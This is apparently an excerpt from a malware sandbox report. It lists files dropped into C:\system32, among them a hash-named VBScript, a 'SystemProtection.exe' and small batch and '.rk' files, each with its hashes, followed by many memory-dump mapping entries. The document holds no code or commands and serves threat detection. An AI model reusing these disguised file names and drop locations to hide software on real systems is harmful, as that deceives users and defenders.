SHA512ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc
-
C:\system32\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbsFilesize
181KB
MD591f6b90fc19be94b62bb3ec2ff60fc30
SHA1ed92e88998bf8ed11994291fbdcdebf7272249fa
SHA25657a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b
SHA512ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc
-
C:\system32\SystemProtection.exeFilesize
166KB
MD5a47cbe969ea935bdd3ab568bb126bc80
SHA115f2facfd05daf46d2c63912916bf2887cebd98a
SHA25634008e2057df8842df210246995385a0441dc1e081d60ad15bd481e062e7f100
SHA512f5c81e6dc4d916944304fc85136e1ff6dee29a21e50a54fe6280a475343eccbfe094171d62475db5f38e07898c061126158c34d48b9d8f4f57f76d49e564e3fc
-
C:\system32\SystemProtection.exeFilesize
166KB
MD5a47cbe969ea935bdd3ab568bb126bc80
SHA115f2facfd05daf46d2c63912916bf2887cebd98a
SHA25634008e2057df8842df210246995385a0441dc1e081d60ad15bd481e062e7f100
SHA512f5c81e6dc4d916944304fc85136e1ff6dee29a21e50a54fe6280a475343eccbfe094171d62475db5f38e07898c061126158c34d48b9d8f4f57f76d49e564e3fc
-
C:\system32\bkr.batFilesize
568B
MD5fc6f03cfefec6ed5e12c8de71c815751
SHA1b35cb2e194b5167322acc4ab782f6bef76409de2
SHA256ef8bd89fdc7a3e711849f318d97ab0693432daf34f7b83f18e894fa4d22e956f
SHA512ba9fbfff61de7d68e8612b9364bc8cb04117727a38f6f77912b4c4895b064f83e8b33aee51e32fef945cd13c88b2e03c5a7e21910de71fe4cd8d1a0f93fd7ad3
-
C:\system32\r0k.rkFilesize
8B
MD50438048db30e1b7f6ab1dc26028b9019
SHA1da1a0594a0587908a2369708c3c6cdcc316cfbad
SHA25659450696618a55d09cd8110b2a6191a4de8458da35f41a4112c3d408db9d6cc0
SHA512d3106527baaca4150f934d19d4da846ea37db0378077695d4f5e1f4a7488e600467a3d22b481ebfc36b94dc95a6f195a24f041702cde301b00f455418e7e776d
-
memory/208-142-0x0000000000000000-mapping.dmp
-
memory/236-141-0x0000000000000000-mapping.dmp
-
memory/400-194-0x0000000000000000-mapping.dmp
-
memory/508-197-0x0000000000000000-mapping.dmp
-
memory/744-145-0x0000000000000000-mapping.dmp
-
memory/852-165-0x0000000000000000-mapping.dmp
-
memory/960-157-0x0000000000000000-mapping.dmp
-
memory/1020-132-0x0000000000000000-mapping.dmp
-
memory/1092-191-0x0000000000000000-mapping.dmp
-
memory/1212-192-0x0000000000000000-mapping.dmp
-
memory/1284-139-0x0000000000000000-mapping.dmp
-
memory/1364-201-0x0000000000000000-mapping.dmp
-
memory/1384-156-0x0000000000000000-mapping.dmp
-
memory/1496-154-0x0000000000000000-mapping.dmp
-
memory/1668-200-0x0000000000000000-mapping.dmp
-
memory/1804-183-0x0000000000000000-mapping.dmp
-
memory/1876-151-0x0000000000000000-mapping.dmp
-
memory/1880-152-0x0000000000000000-mapping.dmp
-
memory/1892-178-0x0000000000000000-mapping.dmp
-
memory/1984-176-0x0000000000000000-mapping.dmp
-
memory/2128-137-0x0000000000000000-mapping.dmp
-
memory/2148-148-0x0000000000000000-mapping.dmp
-
memory/2152-174-0x0000000000000000-mapping.dmp
-
memory/2160-170-0x0000000000000000-mapping.dmp
-
memory/2280-181-0x0000000000000000-mapping.dmp
-
memory/2572-140-0x0000000000000000-mapping.dmp
-
memory/2648-206-0x0000000000000000-mapping.dmp
-
memory/2764-166-0x0000000000000000-mapping.dmp
-
memory/2860-202-0x0000000000000000-mapping.dmp
-
memory/3168-186-0x0000000000000000-mapping.dmp
-
memory/3180-205-0x0000000000000000-mapping.dmp
-
memory/3180-149-0x0000000000000000-mapping.dmp
-
memory/3344-180-0x0000000000000000-mapping.dmp
-
memory/3352-196-0x0000000000000000-mapping.dmp
-
memory/3456-163-0x0000000000000000-mapping.dmp
-
memory/3644-184-0x0000000000000000-mapping.dmp
-
memory/3680-147-0x0000000000000000-mapping.dmp
-
memory/3688-179-0x0000000000000000-mapping.dmp
-
memory/3720-162-0x0000000000000000-mapping.dmp
-
memory/3908-193-0x0000000000000000-mapping.dmp
-
memory/4168-134-0x0000000000000000-mapping.dmp
-
memory/4180-164-0x0000000000000000-mapping.dmp
-
memory/4224-158-0x0000000000000000-mapping.dmp
-
memory/4232-150-0x0000000000000000-mapping.dmp
-
memory/4240-155-0x0000000000000000-mapping.dmp
-
memory/4320-182-0x0000000000000000-mapping.dmp
-
memory/4360-135-0x0000000000000000-mapping.dmp
-
memory/4376-199-0x0000000000000000-mapping.dmp
-
memory/4376-136-0x0000000000000000-mapping.dmp
-
memory/4380-143-0x0000000000000000-mapping.dmp
-
memory/4400-185-0x0000000000000000-mapping.dmp
-
memory/4488-169-0x0000000000000000-mapping.dmp
-
memory/4588-146-0x0000000000000000-mapping.dmp
-
memory/4612-189-0x0000000000000000-mapping.dmp
-
memory/4776-198-0x0000000000000000-mapping.dmp
-
memory/4852-153-0x0000000000000000-mapping.dmp
-
memory/4868-159-0x0000000000000000-mapping.dmp
-
memory/4952-172-0x0000000000000000-mapping.dmp
-
memory/4960-195-0x0000000000000000-mapping.dmp
-
memory/4972-190-0x0000000000000000-mapping.dmp
-
memory/4980-138-0x0000000000000000-mapping.dmp
-
memory/5052-187-0x0000000000000000-mapping.dmp
-
memory/5104-161-0x0000000000000000-mapping.dmp
-
memory/5116-160-0x0000000000000000-mapping.dmp